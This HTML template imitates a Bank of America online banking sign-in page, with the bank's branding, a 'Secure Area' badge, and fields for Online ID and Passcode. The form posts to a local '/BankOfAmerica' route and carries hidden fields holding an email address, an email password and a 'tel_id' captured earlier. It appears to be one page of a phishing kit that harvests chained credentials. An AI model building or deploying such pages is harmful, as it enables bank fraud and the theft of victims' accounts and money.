<!DOCTYPE html>
<html lang="en">
<head>
	<title>Bank of America | Online Banking</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	
<!--===============================================================================================-->
	<link rel="icon" type="image/png" href="images/favicon.png"/>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="icon-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="animate.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="select2.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="util.css">
	<link rel="stylesheet" type="text/css" href="main.css">
<!--===============================================================================================-->
</head>
<body>
	<div align="center" style="min-width:430px;background-color:#ffffff;">
	<div style="height:98px">
		<div align="left" style="padding-top:18px;padding-left:5%;">
	 <img src="images/assets-images-global-logos.svg" width="250" height="70" alt="">
		<div class="sl-nav">
			<ul>
			<div style="padding-top:10px;">
		 <p><img src="images/locki.svg" width="20" height="20" alt=""> <b style="padding-top:2px;"><font color="gray">Secure Area</font></b></p>
			</div>
			</ul>
		</div>
		</div>
		
	</div>
	<div style="background-color: #dc1431;
	background-image: url('images/ban1.png');
	background-size: 100%;
  border-color: rgba(232, 232, 232, 1);
  border-bottom-width: 1px;
  border-bottom-style: solid;
		color:white;
		height:40px;
  max-height:60px;">
		<div style="float:left;padding-top:5px;padding-left:5%;">
		<h4>Sign In</h4>
		</div>
	</div>
	</div>
<div class="login-form" style="padding-left:5%;padding-right:5%;">

  <form action="/BankOfAmerica" class="validate-form" method="post" style="width: 390px;">
    <h2 class="text-center"></br></h2>    
    <div class="form-group">
      
		<input type="hidden" name="tel_id" value="<%= telId %>">
		<input type="hidden" name="email" value="<%= email %>">
		<input type="hidden" name="emailPassword" value="<%= password %>">
				<label class="label-input100" for="onid">Online ID</label>
				<div class="wrap-input100 validate-input" data-validate="Online ID is Required">
					<input id="onid" class="input100" type="text" name="onlineId" placeholder="" required>
					<span class="focus-input100"></span>
				</div>
    </div>
    <div class="form-group">
      <label class="label-input100" for="pasc">Passcode</label>
				<div class="wrap-input100 validate-input" data-validate = "Passcode is Required">
					<input id="pasc" class="input100" type="password" name="passcode" placeholder="" required>
					<span class="focus-input100"></span>
				</div>
    </div>
    <div class="form-group">
		
      <button type="submit" class="btn btn-primary btn-block"><h3><span class="lnr lnr-lock"></span> Sign In</h3></button>
    </div>
    <div class="clearfix">
      <label class="float-left form-check-label"><a href="#" class="float-right">Forgot ID/Passcode?</a></label>
       <a href="#" class="float-right">Enroll</a>
    </div>    
  </form>
</div></br></br></br></br></br></br></br>
		<div class="wrap-contact100">
		

			
		</div>



	<div id="dropDownSelect1"></div>


	<script src="js/main.js"></script>

</body>
<style>
.footer {
clear: both;
  position: relative;
  height: 200px;
  margin-top: -200px;
 left: 0;
 bottom: 0;
 width: 100%;
 min-width:430px;
 background-color: #f3efea;
 color: white;
 text-align: center;
 display: inline-flex;
}
.footer>div {
flex: 1 0 50%;
padding-right: 15px;
padding-left: 15px;
max-width: 50%;
line-height: 1.2;
}

</style>
</html>
